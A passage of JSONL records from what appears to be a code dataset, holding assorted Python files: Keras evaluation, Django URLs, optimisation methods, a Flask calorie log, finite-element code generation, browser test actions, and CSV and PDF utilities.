SWList:\n\t\t\tif (performQuestion(\"prop-nl:\"+makeAZ(item.lower()), URI)):\n\t\t\t\tbreak\n\t\t\telif SWList.index(item) == len(SWList) - 1:\n\t\t\t\tprint(\"No solution found!\")\n\telse:\n\t\tif (not performQuestion(q.property, URI)):\n\t\t\tprint(\"No solution found!\")\n\nprint(\"Terminating Program!\", file=sys.stderr)\n","sub_path":"Assignment3/s2525119-A3.py","file_name":"s2525119-A3.py","file_ext":"py","file_size_in_byte":8333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"55706286","text":"#! /usr/bin/env python3\nimport os\nfrom glob import glob\nimport argparse\nfrom tensorflow import keras\nimport utils\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--idx_ckpt', type=int, default=-1,\n help='Index of the checkpoint to load. (default: -1)')\nparser.add_argument('--fft', dest='fft', action='store_true')\nparser.add_argument('--fashion', dest='fashion', action='store_true')\nargs = parser.parse_args()\n\ncheckpoints = sorted(glob('logs/*'))\nif len(checkpoints):\n [print(f'{idx}: {ckpt}') for idx, ckpt in enumerate(checkpoints)]\nelse:\n raise ValueError('Can not find any checkpoint.')\n\nif args.fashion:\n mnist = keras.datasets.fashion_mnist\nelse:\n mnist = keras.datasets.mnist\n\n_, (x_test, y_test) = mnist.load_data()\n\nutils.allow_gpu_memory_growth()\n\nmodel = utils.build_model(fft=args.fft)\nmodel.compile(\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy']\n)\n\nloss, acc = model.evaluate(x_test, y_test, verbose=0)\n\nprint(f'[!] Untrained model: accuracy = {100 * acc:5.2f}%')\n\nprint(f'Loading {checkpoints[args.idx_ckpt]}')\nmodel.load_weights(os.path.join(checkpoints[args.idx_ckpt], 'cp.ckpt'))\n\nloss, acc = model.evaluate(x_test, y_test, verbose=0)\n\nprint(f'[!] Restored model: accuracy = {100 * acc:5.2f}%')\n","sub_path":"eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"531493763","text":"\"\"\"kohnavardi URL Configuration\r\n\r\nThe `urlpatterns` list routes URLs to views. For more information please see:\r\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\r\nExamples:\r\nFunction views\r\n 1. Add an import: from my_app import views\r\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\r\nClass-based views\r\n 1. Add an import: from other_app.views import Home\r\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\r\nIncluding another URLconf\r\n 1. Import the include() function: from django.urls import include, path\r\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\r\n\"\"\"\r\nfrom django.urls import path , include\r\nfrom .views import *\r\nfrom django.contrib.auth.views import LoginView , LogoutView\r\nfrom . import admin_view\r\n\r\n\r\n\r\napp_name = 'Account'\r\nurlpatterns = [\r\n\tpath('login/',Login,name = 'login'),\r\n\tpath('logout/', Logout, name='logout'),\r\n\tpath('Profile/', Profile, name='profile'),\r\n\tpath('change_password/', Change_Password, name='change_password'),\r\n\tpath('all_orders/', admin_view.All_Orders, name='all_orders'),\r\n\tpath('orders/', Customer_Orders, name='orders'),\r\n\tpath('travels/', Travels, name='travels'),\r\n\tpath('add_product/', admin_view.Add_Product, name='add_product'),\r\n\tpath('all_products/', admin_view.All_Products, name='all_products'),\r\n\tpath('edit_product//', admin_view.Edite_Product, name='edit_product'),\r\n\tpath('add_group/', admin_view.Add_Group, name='add_group'),\r\n\tpath('all_grouping/', admin_view.All_Grouping, name='all_grouping'),\r\n\tpath('edit_grouping/', admin_view.Edit_Grouping, name='edit_grouping'),\r\n\tpath('add_category/', admin_view.Add_Category, name='add_category'),\r\n\tpath('all_category/', admin_view.All_Category, name='all_category'),\r\n\tpath('edit_category//', admin_view.Edit_Category, name='edit_category'),\r\n\tpath('all_sliders/', admin_view.All_Slider, name='all_slider'),\r\n\tpath('add_slider/', admin_view.Add_Slider, name='add_slider'),\r\n\tpath('edit_slider//', admin_view.Edit_Slider, name='edit_slider'),\r\n\r\n\r\n]\r\n","sub_path":"Account/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"237714820","text":"from math import ceil, sqrt\nfrom utils import FuncCounter\n\n\ndef naive_method(func, a, b, eps=0.01, debug=False):\n \"\"\"Минимизация наивным методом\"\"\"\n f = FuncCounter(func)\n n = ceil((b - a) / eps)\n tests = []\n\n for i in range(n + 1):\n x = a + eps * i\n tests.append((f(x), x))\n\n minimum = min(tests)[1]\n if debug:\n print(\"naive_method func counter\", f.counter)\n return minimum\n\n\ndef dichotomy_method(func, a, b, eps=0.01, delta_mult=0.5, debug=False):\n \"\"\"Минимизация методом дихотомии\"\"\"\n f = FuncCounter(func)\n delta = eps * delta_mult\n\n ai = a\n bi = b\n\n while (bi - ai) > eps * 2:\n ci = (ai + bi - delta) / 2\n di = (ai + bi + delta) / 2\n\n if f(ci) <= f(di):\n ai = ai\n bi = di\n else:\n ai = ci\n bi = bi\n\n if debug:\n print(\"dichotomy_method func counter\", f.counter)\n return (bi + ai) / 2\n\n\ndef gold_sech_method(func, a, b, eps=0.01, debug=False):\n \"\"\"Минимизация методом золотого сечения\"\"\"\n f = FuncCounter(func)\n ai = a\n bi = b\n ci = ai + (bi - ai) * (3 - sqrt(5)) / 2\n di = ai + (bi - ai) * (sqrt(5) - 1) / 2\n\n while (bi - ai) > eps * 2:\n if f(ci) <= f(di):\n ai = ai\n bi = di\n di = ci\n ci = ai + (bi - ai) * (3 - sqrt(5)) / 2\n else:\n ai = ci\n bi = bi\n ci = di\n di = ai + (bi - ai) * (sqrt(5) - 1) / 2\n\n if debug:\n print(\"gold_sech_method func counter\", f.counter)\n\n return (bi + ai) / 2\n","sub_path":"zero_order_methods.py","file_name":"zero_order_methods.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"181904186","text":"lista = [5,7,4,18,3,7,5,1,2,12,7,13]\nx = int(max(lista))\ntab = [1]*(x+1)\n\nfor i in range(2, x): # Tworzy tablice [1,1,1,1,0,1,0,1,0,0...]\n if(tab[i]==1): # indeksy jedynek to liczby pierwsze\n for j in range(i+1, x+1):\n if (j%i==0):\n tab[j]=0\n\nliczby_pierwsze = []\nfor k in range(2,x+1): # Tworzy listę liczb pierwszych \n if(tab[k]==1):\n liczby_pierwsze = liczby_pierwsze + [k]\n \nuniq = list(set(lista)) # Tworzy listę unikalnych wartosci z \"listy\" \n \nfor l in range(len(uniq)): # Pętla wszystkich liczb z uniq\n if (lista.count(uniq[l])%2!=0): # Jeśli liczba nie jest parzysta\n if (liczby_pierwsze.count(uniq[l])>0): # i jeśli liczba występuje w liczby_pierwsze\n for m in range(0,lista.count(uniq[l])): # usuwa wszystkie takie liczby z \"listy\" \n lista.remove(uniq[l]) \nprint(lista)\n","sub_path":"WDI/Zajecia7/Zadanie1.py","file_name":"Zadanie1.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"487872708","text":"from flask import Flask, request, render_template, redirect\nimport time\nFORMAT = \"%Y-%m-%d\"\nheute=time.strftime(FORMAT)\n\napp = Flask(__name__)\n\nclass Plan():\n def __init__(self, datum, kalorien, text):\n self.datum = datum\n self.kalorien = kalorien\n self.text = text\n\n def __str__(self):\n return self.datum + \"\\t\" + self.kalorien + \"\\t\" + self.text\n\n def to_csv(self):\n return self.datum + \";\" + self.kalorien + \";\" + self.text\n\ndef read_log(filename):\n log = open(filename, encoding='utf-8')\n inhalt = []\n for line in log:\n zwischenspeicher = line.rstrip().split(\";\")\n if (len(zwischenspeicher) == 3):\n fields = line.rstrip().split(\";\")\n zwischenspeicher = Plan(fields[0], fields[1], fields[2])\n inhalt.append(zwischenspeicher)\n elif (len(zwischenspeicher) == 2):\n fields = line.rstrip().split(\";\")\n zwischenspeicher = Plan(fields[0], fields[1], \"\")\n inhalt.append(zwischenspeicher)\n else:\n print(\"Error! Länge des Eintrags nicht 2 oder 3\")\n log.close()\n return inhalt\n\ndef write_log(inhalt):\n log = open(\"log.txt\", \"w\", encoding='utf-8')\n for entrys in inhalt:\n log.write(entrys.to_csv() + \"\\n\")\n log.close\n\n\n@app.route('/')\ndef show():\n inhalt = read_log(\"log.txt\")\n return render_template('index.html', inhalt=inhalt, heute=heute)\n\n@app.route('/add_entry', methods=[\"POST\"])\ndef add_entry():\n datum = request.form.get('Datum')\n datum = datum.split('-')\n datum = datum[2] + '.' + datum[1] + '.' + datum[0]\n kalorien = request.form.get('Kalorien')\n text = request.form.get('Text')\n log = read_log('log.txt')\n log.append(Plan(datum, kalorien, text))\n write_log(log)\n return redirect('/')\n\n@app.route('/delete_entry')\ndef delete_entry():\n log=read_log('log.txt')\n nummer = request.args.get('index')\n del log[int(nummer)]\n write_log(log)\n return redirect('/')\n\n@app.route('/change')\ndef nummer():\n inhalt = read_log('log.txt')\n nummer = int(request.args.get('index'))\n datum = inhalt[nummer].datum\n datum = datum.split('.')\n datum = datum[2] + '-' + datum[1] + '-' + datum[0]\n print(datum)\n return render_template('change.html', inhalt=inhalt, nummer=nummer, datum=datum)\n\n@app.route('/bearbeiten', methods=[\"POST\"])\ndef bearbeiten():\n log = read_log('log.txt')\n nummer = int(request.form.get('nummer'))\n datum = request.form.get('cDatum')\n datum = datum.split('-')\n datum = datum[2] + '.' + datum[1] + '.' + datum[0]\n kalorien = request.form.get('cKalorien')\n text = request.form.get('cText')\n log[nummer] = Plan(datum, kalorien, text)\n write_log(log)\n return redirect('/')\n\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"app_V1.py","file_name":"app_V1.py","file_ext":"py","file_size_in_byte":2796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"173773713","text":"# coding: utf-8\n\n# TODO: - allow for giving a name for the trial/test basis\n# - Ni/Nj should be Ni_0/Nj_0\n# - define templates as proper python functions\n# - use redbaron to modify the template\n\n# NOTE: THE PATH OF TEMPLATES IS HARD CODED!\n\n\nfrom sympy.core.containers import Tuple\nfrom sympy import Matrix\nfrom sympy import Integer, Float\n\nfrom numbers import Number\nfrom collections import OrderedDict\n\nfrom numpy import unique\nimport os\nimport importlib\n\nfrom symfe.core import gelatize\nfrom symfe.core import BilinearForm, LinearForm, FunctionForm\nfrom symfe.core import Constant\nfrom symfe.core import Field\n\nfrom .utils import mkdir_p\nfrom .utils import write_code\nfrom .utils import arguments_datatypes_as_dict\nfrom .utils import arguments_datatypes_split\n\nfrom .mapping import construct_mapping_coeffs_name\nfrom .mapping import construct_mapping_get_coeffs\nfrom .mapping import construct_mapping_var\n\nfrom .matrix import construct_element_matrix_names\nfrom .matrix import print_element_matrix_args\nfrom .matrix import print_element_matrix_decs\nfrom .matrix import construct_global_matrix_names\nfrom .matrix import print_global_matrix_args\nfrom .matrix import print_global_matrix_update\nfrom .matrix import construct_argument_matrix_name\nfrom .matrix import print_argument_matrix_kwargs\nfrom .matrix import print_define_global_matrix\n\nfrom .vector import construct_element_vector_names\nfrom .vector import print_element_vector_args\nfrom .vector import print_element_vector_decs\nfrom .vector import construct_global_vector_names\nfrom .vector import print_global_vector_args\nfrom .vector import print_global_vector_decs\nfrom .vector import print_global_vector_update\nfrom .vector import construct_argument_vector_name\nfrom .vector import print_argument_vector_kwargs\nfrom .vector import print_define_global_vector\n\nfrom .array import construct_element_array_names\nfrom .array import print_element_array_args\nfrom .array import print_element_array_decs\nfrom .array import construct_global_array_names\nfrom .array import print_global_array_args\nfrom .array import print_global_array_decs\nfrom .array import print_global_array_update\nfrom .array import construct_argument_array_name\nfrom .array import print_argument_array_kwargs\nfrom .array import print_define_global_array\n\nfrom .field import construct_field_names\nfrom .field import print_field_coeffs_slices\n\n# NOTE: test_n_components, trial_n_components will be provided after calling compile_kernel\ndef compile_assembly(name, a, kernel_name=None,\n verbose=False,\n namespace=globals(),\n context=None,\n is_vector=False,\n test_n_components=1,\n trial_n_components=1,\n backend='python',\n export_pyfile=True):\n \"\"\".\"\"\"\n # ...\n assembly_name = name\n docstring = ''\n if kernel_name is None:\n kernel_name = 'kernel_{}'.format(name)\n # ...\n\n # ... weak form attributs\n dim = a.ldim\n fields = a.fields\n mapping = a.mapping\n\n is_bilinear_form = isinstance(a, BilinearForm)\n is_linear_form = isinstance(a, LinearForm)\n is_function_form = isinstance(a, FunctionForm)\n is_logical = mapping is None\n\n if is_bilinear_form:\n form = 'bilinear'\n\n elif is_linear_form:\n form = 'linear'\n\n elif is_function_form:\n form = 'function'\n # ...\n\n # ... contants\n d_args = arguments_datatypes_as_dict(a.constants)\n args, dtypes = arguments_datatypes_split(d_args)\n # ...\n\n # ... fields\n fields_str = ''\n fields_coeffs_str = ''\n if fields:\n fields_str = construct_field_names(fields)\n fields_coeffs_str = print_field_coeffs_slices(fields, dim)\n # ...\n\n # ... get name of the template to be used\n template_str = '_assembly_{form}_{dim}d'.format(dim=dim,\n form=form)\n # ...\n\n # ... import the variable from the templates module\n # NOTE: THE PATH IS HARD CODED HERE!\n try:\n package = importlib.import_module(\"symfe.codegen.templates.assembly\")\n\n except:\n raise ImportError('could not import {0}'.format(name))\n\n template = getattr(package, template_str)\n # ...\n\n # ... identation (def function body)\n tab = ' '*4\n # ...\n\n # ...\n n_rows = test_n_components\n n_cols = trial_n_components\n # ...\n\n # ...\n argument_mat = ''\n argument_mat_kwargs = ''\n\n global_mat_args = ''\n global_mat_args_str = ''\n global_mat_decs_str = ''\n global_mat_update_str = ''\n\n element_mat_args = ''\n element_mat_args_str = ''\n element_mat_decs_str = ''\n\n argument_vec = ''\n argument_vec_kwargs = ''\n\n global_vec_args = ''\n global_vec_args_str = ''\n global_vec_decs_str = ''\n global_vec_update_str = ''\n\n element_vec_args = ''\n element_vec_args_str = ''\n element_vec_decs_str = ''\n\n argument_arr = ''\n argument_arr_kwargs = ''\n\n global_arr_args = ''\n global_arr_args_str = ''\n global_arr_decs_str = ''\n global_arr_update_str = ''\n\n element_arr_args = ''\n element_arr_args_str = ''\n element_arr_decs_str = ''\n\n element_wise_str = ''\n\n if is_bilinear_form:\n argument_mat = construct_argument_matrix_name(n_rows, n_cols)\n argument_mat_kwargs = print_argument_matrix_kwargs(argument_mat)\n\n global_mat_args = construct_global_matrix_names(n_rows, n_cols)\n global_mat_args_str = print_global_matrix_args(n_rows, n_cols, global_mat_args)\n global_mat_decs_str = print_define_global_matrix(n_rows, n_cols, global_mat_args, argument_mat, tab)\n\n element_mat_args = construct_element_matrix_names(n_rows, n_cols)\n element_mat_args_str = print_element_matrix_args(n_rows, n_cols, element_mat_args)\n element_mat_decs_str = print_element_matrix_decs(n_rows, n_cols, dim, element_mat_args, tab)\n\n # ...\n for i in range(0, dim):\n tab += ' '*4\n\n global_mat_update_str = print_global_matrix_update(n_rows, n_cols, dim,\n element_mat_args,\n global_mat_args,\n tab)\n # ...\n\n elif is_linear_form:\n argument_vec = construct_argument_vector_name(n_rows)\n argument_vec_kwargs = print_argument_vector_kwargs(argument_vec)\n\n global_vec_args = construct_global_vector_names(n_rows)\n global_vec_args_str = print_global_vector_args(n_rows, global_vec_args)\n global_vec_decs_str = print_define_global_vector(n_rows, global_vec_args, argument_vec, tab)\n\n element_vec_args = construct_element_vector_names(n_rows)\n element_vec_args_str = print_element_vector_args(n_rows, element_vec_args)\n element_vec_decs_str = print_element_vector_decs(n_rows, dim, element_vec_args, tab)\n\n # ...\n for i in range(0, dim):\n tab += ' '*4\n\n global_vec_update_str = print_global_vector_update(n_rows, dim,\n element_vec_args,\n global_vec_args,\n tab)\n # ...\n\n elif is_function_form:\n argument_arr = construct_argument_array_name(n_rows)\n argument_arr_kwargs = print_argument_array_kwargs(argument_arr)\n\n global_arr_args = construct_global_array_names(n_rows)\n global_arr_args_str = print_global_array_args(n_rows, global_arr_args)\n global_arr_decs_str = print_define_global_array(n_rows, dim, global_arr_args, argument_arr, tab)\n\n element_arr_args = construct_element_array_names(n_rows)\n element_arr_args_str = print_element_array_args(n_rows, element_arr_args)\n element_arr_decs_str = print_element_array_decs(n_rows, dim, element_arr_args, tab)\n\n # ...\n for i in range(0, dim):\n tab += ' '*4\n\n global_arr_update_str = print_global_array_update(n_rows, dim,\n element_arr_args,\n global_arr_args,\n tab)\n # ...\n\n element_wise_str = ', element_wise=False'\n # TODO improve, not sure this can be pyccelized!!\n argument_arr = '{arg} if element_wise else {arg}.sum()'.format(arg=argument_arr)\n # ...\n\n # ...\n mapping_coeffs_str = ''\n mapping_get_coeffs_str = ''\n mapping_str = ''\n if mapping:\n mapping_coeffs_str = construct_mapping_coeffs_name(mapping)\n mapping_coeffs_str = ', {}'.format(mapping_coeffs_str)\n\n mapping_str = construct_mapping_var()\n mapping_str = ', {}'.format(mapping_str)\n\n mapping_get_coeffs_str = construct_mapping_get_coeffs(dim)\n # ...\n\n # ...\n code = template.format(__ASSEMBLY_NAME__=assembly_name,\n __ARGS__=args,\n __DOCSTRING__=docstring,\n __MAPPING__=mapping_str,\n __MAPPING_GET_COEFFS__=mapping_get_coeffs_str,\n __FIELDS__=fields_str,\n __FIELDS_COEFFS__=fields_coeffs_str,\n\n __ARGUMENT_MAT_KWARGS__=argument_mat_kwargs,\n __GLOBAL_MAT_DEC__=global_mat_decs_str,\n __GLOBAL_MAT_ARGS__=argument_mat,\n __ELEMENT_MAT_DEC__=element_mat_decs_str,\n __ELEMENT_MAT_ARGS__=element_mat_args_str,\n __GLOBAL_MAT_UPDATE__=global_mat_update_str,\n\n __ARGUMENT_VEC_KWARGS__=argument_vec_kwargs,\n __GLOBAL_VEC_DEC__=global_vec_decs_str,\n __GLOBAL_VEC_ARGS__=argument_vec,\n __ELEMENT_VEC_DEC__=element_vec_decs_str,\n __ELEMENT_VEC_ARGS__=element_vec_args_str,\n __GLOBAL_VEC_UPDATE__=global_vec_update_str,\n\n __ARGUMENT_ARR_KWARGS__=argument_arr_kwargs,\n __GLOBAL_ARR_DEC__=global_arr_decs_str,\n __GLOBAL_ARR_ARGS__=argument_arr,\n __ELEMENT_ARR_DEC__=element_arr_decs_str,\n __ELEMENT_ARR_ARGS__=element_arr_args_str,\n __GLOBAL_ARR_UPDATE__=global_arr_update_str,\n\n __ELEMENT_WISE__=element_wise_str,\n\n __KERNEL_NAME__=kernel_name)\n # ...\n\n# print('--------------')\n# print(code)\n# print('--------------')\n# import sys; sys.exit(0)\n\n # ...\n if context:\n from pyccel.epyccel import ContextPyccel\n\n if isinstance(context, ContextPyccel):\n context = [context]\n elif isinstance(context, (list, tuple)):\n for i in context:\n assert(isinstance(i, ContextPyccel))\n else:\n raise TypeError('Expecting a ContextPyccel or list/tuple of ContextPyccel')\n\n # append functions to the namespace\n for c in context:\n for k,v in list(c.functions.items()):\n namespace[k] = v[0]\n # ...\n\n # ...\n exec(code, namespace)\n assembly = namespace[name]\n # ...\n\n # ... export the python code of the module\n if export_pyfile:\n write_code(name, code, ext='py', folder='.pyccel')\n # ...\n\n return assembly\n","sub_path":"symfe/codegen/assembly.py","file_name":"assembly.py","file_ext":"py","file_size_in_byte":11682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"209571540","text":"# -*- coding: utf-8 -*-\n\n# Licensed under the Open Software License (\"OSL\") v. 3.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n\n# http://www.opensource.org/licenses/osl-3.0.php\n\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport time\n\nfrom pyccuracy.page import PageRegistry, Page\nfrom pyccuracy.actions import ActionBase\nfrom pyccuracy.languages import LanguageItem\n\nclass PageGoToAction(ActionBase):\n '''Navigates to a page or url.'''\n regex = LanguageItem('page_go_to_regex')\n\n def execute(self, context, url):\n page, resolved_url = PageRegistry.resolve(context.settings, url.replace('\"', ''), must_raise=False)\n\n if not resolved_url or (not url.startswith('\"') and not page):\n raise self.failed(context.language.format(\"page_go_to_failure\", url))\n\n context.browser_driver.page_open(resolved_url)\n context.browser_driver.wait_for_page()\n context.url = resolved_url\n if page:\n # If the resolved page is the same as the current one, \n # there's not need to override the context page, risking\n # losing all the re-registered elements of the users.\n if not isinstance(context.current_page, page):\n context.current_page = page()\n if hasattr(context.current_page, \"register\"):\n context.current_page.register()\n\nclass PageAmInAction(ActionBase):\n '''Changes the current page without actually navigating to it.'''\n regex = LanguageItem(\"page_am_in_regex\")\n\n def execute(self, context, url):\n page, resolved_url = PageRegistry.resolve(context.settings, url, must_raise=False)\n\n if page:\n # If the resolved page is the same as the current one, \n # there's not need to override the context page, risking\n # losing all the re-registered elements of the users.\n if not isinstance(context.current_page, page):\n context.current_page = page()\n if hasattr(context.current_page, \"register\"):\n context.current_page.register()\n context.url = resolved_url\n else:\n raise self.failed(context.language.format(\"page_am_in_failure\", url))\n\nclass PageSeeTitleAction(ActionBase):\n '''Verifies that the current page's title matches the specified one. Raises otherwise.'''\n regex = LanguageItem('page_see_title_regex')\n\n def execute(self, context, title):\n expected_title = context.browser_driver.get_title()\n if (title != expected_title):\n raise self.failed(context.language.format(\"page_see_title_failure\", title, expected_title))\n\nclass PageCheckContainsMarkupAction(ActionBase):\n regex = LanguageItem(\"page_check_contains_markup_regex\")\n\n def execute(self, context, expected_markup):\n html = context.browser_driver.get_html_source()\n\n if expected_markup not in html:\n msg = context.language.format(\"page_check_contains_markup_failure\", expected_markup)\n raise self.failed(msg)\n\nclass PageCheckDoesNotContainMarkupAction(ActionBase):\n regex = LanguageItem(\"page_check_does_not_contain_markup_regex\")\n\n def execute(self, context, expected_markup):\n html = context.browser_driver.get_html_source()\n\n if expected_markup in html:\n msg = context.language.format(\"page_check_does_not_contain_markup_failure\", expected_markup)\n raise self.failed(msg)\n\nclass PageSeeTitleAction(ActionBase):\n regex = LanguageItem(\"page_see_title_regex\")\n\n def execute(self, context, title):\n actual_title = context.browser_driver.get_title()\n if (actual_title != title):\n msg = context.language.format(\"page_see_title_failure\", actual_title, title)\n raise self.failed(msg)\n\nclass PageWaitForPageToLoadAction(ActionBase):\n regex = LanguageItem(\"page_wait_for_page_to_load_regex\")\n\n def execute(self, context, timeout):\n try:\n timeout = float(timeout)\n except Exception:\n timeout = None\n\n if timeout:\n context.browser_driver.wait_for_page(timeout * 1000)\n else:\n context.browser_driver.wait_for_page()\n\nclass PageWaitForSecondsAction(ActionBase):\n regex = LanguageItem(\"page_wait_for_seconds_regex\")\n\n def execute(self, context, timeout):\n try:\n timeout = float(timeout)\n except ValueError:\n raise self.failed(\"The specified time cannot be parsed into a float number: %s\" % timeout)\n\n time.sleep(timeout)\n\n","sub_path":"pyccuracy/actions/core/page_actions.py","file_name":"page_actions.py","file_ext":"py","file_size_in_byte":4901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"180202947","text":"import json\n\nfrom pdf_text_overlay import pdf_writer, pdf_from_template\n\nconfiguration = json.loads(\"\"\"\n [{\n \"page_number\": 0,\n \"variables\":[\n {\n \"name\": \"first_name\",\n \"x-coordinate\": 130,\n \"y-coordinate\": 710,\n \"font_size\": 10\n },\n {\n \"name\": \"last_name\",\n \"x-coordinate\": 130,\n \"y-coordinate\": 695,\n \"font_size\": 8\n }]\n}]\"\"\")\n\ndata = json.loads(\"\"\"\n {\n \"first_name\": \"Goli\",\n \"last_name\": \"Male\",\n \"user_ifsc\": \"HDFC0004421\",\n \"bank_name\": \"HDFC BANK\"\n }\n\"\"\")\n\noriginal_pdf = open(\"Blank_Pdf.pdf\", \"rb\")\nfont = open(\"Lato-Italic.ttf\", \"rb\")\noutput = pdf_writer(original_pdf, configuration, data, font)\noutputStream = open(\"output.pdf\", \"wb\")\noutput.write(outputStream)\noutputStream.close()\n\n# Demo: pdf from jinja template\njinja_data = {\n \"title\": \"Jinja PDF Demo\",\n \"stocks\": [\n {\"symbol\": \"PIEDPIPER\", \"qty\": 100, \"price\": 2500},\n {\"symbol\": \"HOOLI\", \"qty\": 100, \"price\": 2500},\n ]\n}\n\nwith open(\"template.html\") as htmlfile:\n html_str = htmlfile.read()\n filecontent = pdf_from_template(html_str, jinja_data)\n f = open('output.pdf', 'wb')\n f.write(filecontent)\n f.close()\n","sub_path":"examples/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"243701394","text":"def read_csv(path_to_csv_file, delimiter=\",\"):\r\n try:\r\n with open(path_to_csv_file) as inp:\r\n new_file = []\r\n for line in inp:\r\n line = line.strip()\r\n new_line = [i for i in line.split(delimiter)]\r\n if '\"' in line:\r\n word = ''\r\n new_line_2 = []\r\n for elem in new_line:\r\n if elem[0] == '\"' and elem[-1] == '\"':\r\n new_line_2.append(elem[1:(len(elem) - 1)])\r\n elif elem[0] == '\"':\r\n word += elem[1:(len(elem))] + delimiter\r\n elif elem[-1] == '\"':\r\n word += elem[0:(len(elem) - 1)]\r\n new_line_2.append(word)\r\n word = ''\r\n elif len(word) != 0:\r\n word += elem + delimiter\r\n else:\r\n new_line_2.append(elem)\r\n new_line = new_line_2\r\n new_file.append(new_line)\r\n return new_file\r\n\r\n except FileNotFoundError:\r\n print(\"Error, such file doesn't exist\")\r\n return []\r\n\r\n\r\ndef write_csv(path_to_csv_file: str, data: list, delimiter=','):\r\n if type(path_to_csv_file) != str or type(data) != list or type(delimiter) != str:\r\n print(\"Arguments: path_to_csv_file (str, create/rewrite file), data (list), delimeter (str: 'symbol')\")\r\n else:\r\n with open(path_to_csv_file, \"w\") as file:\r\n for elem in data:\r\n for i in range(len(elem) - 1):\r\n if delimiter in elem[i]:\r\n file.write('\"' + elem[i] + '\"')\r\n else:\r\n file.write(elem[i] + delimiter)\r\n if delimiter in elem[-1]:\r\n file.write('\"' + elem[-1] + '\"')\r\n else:\r\n file.write(elem[-1])\r\n file.write('\\n')\r\n\r\n\r\n\r\n\r\n","sub_path":"mycsv.py","file_name":"mycsv.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"418973306","text":"import tensorflow as tf\nimport sys\n\nclass DNNVariable(object):\n def __init__(self,topologies):\n self._weights = []\n self._biases = []\n for l in range(1, len(topologies)):\n layer_weight = tf.Variable(tf.random_normal(topologies[l-1:l+1], stddev=0.01))\n self._weights.append(layer_weight)\n layer_biases = tf.Variable(tf.constant(0.1, shape=topologies[l:l+1]))\n self._biases.append(layer_biases)\n\n @property\n def weights(self):\n return self._weights\n \n @property\n def weight_values(self):\n values = []\n for l in range(len(self._weights)):\n values.append(self._weights[l].eval())\n return values;\n \n @property\n def biases(self):\n return self._biases\n \n @property\n def bias_values(self):\n values = []\n for l in range(len(self._biases)):\n values.append(self._biases[l].eval())\n return values;\n \nclass NNConstVariable(object):\n def __init__(self,src_variable):\n self._weights =[]\n self._biases = []\n for layer in src_variable:\n layer_weight =[]\n layer_bias = []\n for src_node in layer:\n layer_weight.append(src_node[0:-1])\n layer_bias.append(src_node[-1])\n print(src_node)\n pause = sys.stdin.readline()\n self._weights.append(tf.Variable(tf.constant(layer_weight)))\n self._biases.append(tf.Variable(tf.constant(layer_bias)))\n\n @property\n def weights(self):\n return self._weights\n \n @property\n def weight_values(self):\n values = []\n for l in range(len(self._weights)):\n values.append(self._weights[l].eval())\n return values;\n \n @property\n def biases(self):\n return self._biases\n \n @property\n def bias_values(self):\n values = []\n for l in range(len(self._biases)):\n values.append(self._biases[l].eval())\n return values;\n \n","sub_path":"quiz_trainer/dnn_variable.py","file_name":"dnn_variable.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"505580482","text":"import itertools\n\ndef getDistances(ListOfWords, GroupSize = 4):\n\tConcatenated = ''.join(ListOfWords)\n\tUniqueChars = set(Concatenated)\n\t\n\tDistances = []\n\t\n\tGroups = itertools.combinations(UniqueChars, GroupSize)\n\tfor Group in Groups:\n\t\tMaxDist = 0\n\t\tAllDists = []\n\t\t\n\t\tCurrentDist = 0\n\t\tfor Char in Concatenated:\n\t\t\tif Char in Group:\n\t\t\t\tif CurrentDist > MaxDist:\n\t\t\t\t\tMaxDist = CurrentDist\n\t\t\t\tAllDists.append(CurrentDist)\n\t\t\t\tCurrentDist = 0\n\t\t\telse:\n\t\t\t\tCurrentDist += 1\n\t\t# Check last distance too\n\t\tif CurrentDist > 0:\n\t\t\tAllDists.append(CurrentDist)\n\t\t\tif CurrentDist > MaxDist:\n\t\t\t\tMaxDist = CurrentDist\n\t\n\t\tAverageDist = round(sum(AllDists)/float(len(AllDists)), 3)\n\t\tDistances.append([str(Group), MaxDist, AverageDist])\n\t\t\n\treturn Distances\n\ndef sortDistances(Distances):\n\treturn sorted(Distances, key=lambda x: (x[1], x[2]))\n","sub_path":"lib/GroupDistance.py","file_name":"GroupDistance.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"598317278","text":"import matplotlib.pyplot as plt\nimport sys\n\n# file name from command line\ndata = sys.argv[1]\n\nwith open(data, 'r') as f:\n # x stores data of locus #, y stores CUI\n x = []\n y = []\n # parse 